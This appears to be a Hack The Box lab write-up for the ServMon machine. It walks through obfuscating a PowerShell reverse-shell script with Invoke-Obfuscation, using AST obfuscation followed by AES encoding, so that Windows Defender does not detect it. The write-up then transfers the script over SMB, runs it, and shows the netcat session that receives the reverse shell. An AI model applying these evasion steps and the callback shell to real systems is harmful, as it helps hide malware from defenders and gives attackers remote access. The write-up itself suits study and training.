AV Evasion
while there are many techniques to evade the av, i will use the invoke-obfuscation script for this operation.
Invoke-Obfuscation
First of all, remove every single comment in the script
This is because the Windows defenders signature detection might pick that up
┌──(kali㉿kali)-[~/…/htb/labs/servmon/nsclient]
└─$ pwsh
PowerShell 7.2.6
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
┌──(kali㉿kali)-[/home/kali/archive/htb/labs/servmon/nsclient]
└─PS> Start up a PowerShell session in Kali
┌──(kali㉿kali)-[/home/kali/archive/htb/labs/servmon]
└─PS> cd /home/kali/Tools/Invoke-Obfuscation/ ; Import-Module ./Invoke-Obfuscation.psd1
┌──(kali㉿kali)-[/home/kali/Tools/Invoke-Obfuscation]
└─PS> Invoke-ObfuscationImport the module and fire it up
Loaded
Setting the script
Invoke-Obfuscation> SET SCRIPTPATH /home/kali/archive/htb/labs/servmon/nsclient/Invoke-PowerShellTcp.ps1
successfully set scriptpath:
/home/kali/archive/htb/labs/servmon/nsclient/Invoke-PowerShellTcp.ps1within the invoke-obfuscation session, set the [[servmon_payload#invoke-powershelltcp.ps1|PowerShell script]] to obfuscate.
AST Nodes
Choose one of the below options:
[*] TOKEN Obfuscate PowerShell command Tokens
[*] AST Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING Obfuscate entire command as a String
[*] ENCODING Obfuscate entire command via Encoding
[*] COMPRESS Convert entire command to one-liner and Compress
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
Invoke-Obfuscation> AST
Choose one of the below AST options:
[*] AST\NamedAttributeArgumentAst Obfuscate NamedAttributeArgumentAst nodes
[*] AST\ParamBlockAst Obfuscate ParamBlockAst nodes
[*] AST\ScriptBlockAst Obfuscate ScriptBlockAst nodes
[*] AST\AttributeAst Obfuscate AttributeAst nodes
[*] AST\BinaryExpressionAst Obfuscate BinaryExpressionAst nodes
[*] AST\HashtableAst Obfuscate HashtableAst nodes
[*] AST\CommandAst Obfuscate CommandAst nodes
[*] AST\AssignmentStatementAst Obfuscate AssignmentStatementAst nodes
[*] AST\TypeExpressionAst Obfuscate TypeExpressionAst nodes
[*] AST\TypeConstraintAst Obfuscate TypeConstraintAst nodes
[*] AST\ALL Select All choices from above
Invoke-Obfuscation\AST> ALL
Choose one of the below AST\All options to APPLY to current payload:
[*] AST\ALL\1 Execute ALL Ast obfuscation techniques
Invoke-Obfuscation\AST\All> 1
Executed:
CLI: AST\All\1
FULL: Out-ObfuscatedAst -ScriptBlock $ScriptBlock
Result:
[...REDACTED...]First, obfuscate the script by messing up the script’s AST nodes with every single technique available The result is redacted as it is well over 10,000 characters
This alone is already a HUGE improvement to evade Windows Defender, but I am not done yet Better ready and sorry
Invoke-Obfuscation\AST\All> back
Invoke-Obfuscation\AST> backGo back twice to the main menu
AES Encryption
choose one of the below options:
[*] TOKEN Obfuscate PowerShell command Tokens
[*] AST Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING Obfuscate entire command as a String
[*] ENCODING Obfuscate entire command via Encoding
[*] COMPRESS Convert entire command to one-liner and Compress
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
Invoke-Obfuscation> ENCODING
choose one of the below encoding options to apply to current payload:
[*] ENCODING\1 Encode entire command as ASCII
[*] ENCODING\2 Encode entire command as Hex
[*] ENCODING\3 Encode entire command as Octal
[*] ENCODING\4 Encode entire command as Binary
[*] ENCODING\5 Encrypt entire command as SecureString (AES)
[*] ENCODING\6 Encode entire command as BXOR
[*] ENCODING\7 Encode entire command as Special Characters
[*] ENCODING\8 Encode entire command as Whitespace
Invoke-Obfuscation\Encoding> 5
executed:
cli: Encoding\5
full: Out-SecureStringCommand -ScriptBlock $ScriptBlock -PassThru
result:
[...REDACTED...]
warning: This command exceeds the cmd.exe maximum length of 8190.
Its length is 31808 characters.On top of messing up the AST nodes above, encode the result AGAIN cryptographically (AES) This ENSURES ghosting the shit out of Windows Defender
There is a bit of warning that its exceeding the cmd.exe’s maximum length of 8180 bytes
Export
Invoke-Obfuscation> OUT
Enter path for output file (or leave blank for default): /home/kali/archive/htb/labs/servmon/nsclient/obfuscated.ps1
Successfully output ObfuscatedCommand to /home/kali/archive/htb/labs/servmon/nsclient/obfuscated.ps1.Write the final result to /home/kali/archive/htb/labs/servmon/nsclient/obfuscated.ps1
I want to put the final result here but it would likely crash the MD viewing, so I’m just providing the character difference
┌──(kali㉿kali)-[~/…/htb/labs/servmon/nsclient]
└─$ wc -m Invoke-PowerShellTcp.ps1
2657 Invoke-PowerShellTcp.ps1
┌──(kali㉿kali)-[~/…/htb/labs/servmon/nsclient]
└─$ wc -m obfuscated.ps1
31809 obfuscated.ps1The obfuscated.ps1 is about 12 times bigger
Validation
ps c:\tmp> copy \\10.10.14.11\smb\nsclient\obfuscated.ps1 .
ps c:\tmp> dir
directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/30/2023 4:02 AM 31809 obfuscated.ps1I can safely transfer it now
ps c:\tmp> .\obfuscated.ps1
┌──(kali㉿kali)-[~/…/htb/labs/servmon/nsclient]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.184] 49819
Windows PowerShell running as user nadine on SERVMON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
ps c:\tmp> whoami
servmon\nadine
ps c:\tmp> hostname
ServMon
ps c:\tmp> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::141
ipv6 address. . . . . . . . . . . : dead:beef::ad15:f642:8c65:862d
link-local ipv6 address . . . . . : fe80::ad15:f642:8c65:862d%6
ipv4 address. . . . . . . . . . . : 10.10.10.184
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
10.10.10.2It works!
The obfuscated payload is now ready.